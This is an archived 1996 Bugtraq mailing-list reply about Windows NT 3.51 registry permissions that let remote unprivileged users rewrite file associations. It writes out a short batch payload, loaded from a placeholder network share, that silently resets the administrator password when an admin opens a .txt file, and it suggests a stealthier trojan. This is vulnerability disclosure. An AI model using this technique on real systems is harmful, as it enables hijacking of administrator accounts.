[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: NT security et al (Dangers of NetBIOS/NBT?)
From:       Dan Shearer <itudps () lux ! levels ! unisa ! edu ! au>
Date:       1996-09-28 14:05:28
[Download RAW message or body]

On Fri, 27 Sep 1996, Jacob Langseth wrote:

> here's some more:
>     ppl can read portions of the registry remotely (via regedt32.exe).

By default they can _write_ to it too, at least under 3.51 the default
permissions gave Everyone write access to quite a few things. The
canonical example was (is) the key that determines the association
between an application and its extension in file manager. That can be
changed by an unpriveliged, even unknown user with access to regedt32 on
a connected network. Should the .txt entry be changed to point
to:
        \\SomeNTorUnixWorkstation\UnprotectedShare\bogus.cmd

where bogus.cmd contains:

        net user administrator xxxxx /y
        notepad %1 %2 %2 %3 %4 %5

all somone with admin privelige at the console has to do is double-click
on a text file and the admin password is changed. Of course this is a
pretty basic example because the admin would (hopefully) be suspicious on
seeing a dos box pop up. But it is trivial to write a win32 app that both
launches notepad and does some malicious trapdoor stuff with the admin
privelige it has been given.

--
 Dan Shearer                            email: Dan.Shearer@UniSA.edu.au
 Information Technology Unit            Phone: +61 8 302 3479
 University of South Australia          Fax  : +61 8 302 3385

[prev in list] [next in list] [prev in thread] [next in thread]